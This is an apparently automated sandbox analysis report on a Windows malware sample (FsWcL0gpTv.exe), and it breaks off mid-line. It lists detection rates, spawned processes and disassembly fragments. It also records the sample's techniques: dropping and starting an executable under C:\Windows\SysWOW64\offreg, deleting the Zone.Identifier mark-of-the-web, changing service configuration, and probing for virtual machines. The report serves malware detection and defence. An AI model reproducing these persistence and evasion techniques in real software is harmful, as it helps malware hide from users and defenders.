Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: FsWcL0gpTv.exe | Virustotal: Detection: 61%
Source: FsWcL0gpTv.exe | Metadefender: Detection: 45%
Source: FsWcL0gpTv.exe | ReversingLabs: Detection: 70%
Source: unknown | Process created: C:\Users\user\Desktop\FsWcL0gpTv.exe 'C:\Users\user\Desktop\FsWcL0gpTv.exe'
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown | Process created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Process created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02EB1030
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5DF0 push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02EF5DF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5EF0 push ecx; mov dword ptr [esp], 0000669Ch 0_2_02EF5EF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5DC0 push ecx; mov dword ptr [esp], 000089FAh 0_2_02EF5DC1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5CD0 push ecx; mov dword ptr [esp], 00001CE1h 0_2_02EF5CD1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5EA0 push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02EF5EA1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5D90 push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02EF5D91
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5D50 push ecx; mov dword ptr [esp], 00006847h 0_2_02EF5D51
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5D20 push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02EF5D21
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5F20 push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02EF5F21
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5D00 push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02EF5D01
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5E10 push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02EF5E11
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E77ABE push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02E77ABF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E77A8E push ecx; mov dword ptr [esp], 0000669Ch 0_2_02E77A8F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E93E9C push ebx; iretd 0_2_02E93EAF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E93E9C push FFFFFF95h; iretd 0_2_02E93EF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E77A3E push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02E77A3F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E778EE push ecx; mov dword ptr [esp], 00006847h 0_2_02E778EF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E778BE push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02E778BF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E7789E push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02E7789F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E7786E push ecx; mov dword ptr [esp], 00001CE1h 0_2_02E7786F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E939D9 push ss; iretd 0_2_02E939DE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E779AE push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02E779AF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E8858F push edi; iretd 0_2_02E885A1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E7798E push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02E7798F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E7795E push ecx; mov dword ptr [esp], 000089FAh 0_2_02E7795F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E7792E push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02E7792F
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A75EA0 push ecx; mov dword ptr [esp], 0000A3FDh 3_2_02A75EA1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A75D90 push ecx; mov dword ptr [esp], 0000B2E0h 3_2_02A75D91
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A75DF0 push ecx; mov dword ptr [esp], 0000AAF5h 3_2_02A75DF1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A75EF0 push ecx; mov dword ptr [esp], 0000669Ch 3_2_02A75EF1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A75DC0 push ecx; mov dword ptr [esp], 000089FAh 3_2_02A75DC1

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Executable created and started: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | PE file moved: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File opened: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02EF5070
                Source: C:\Windows\System32\svchost.exe TID: 5356 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 3_2_02A738F0
                Source: svchost.exe, 00000004.00000002.501755488.0000017996C64000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000004.00000002.500177833.000001799182A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`s
                Source: svchost.exe, 00000001.00000002.494050614.0000020E88002000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.501721455.0000017996C57000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000007.00000002.500021852.0000027766466000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.500101123.0000021FB9C29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.0000<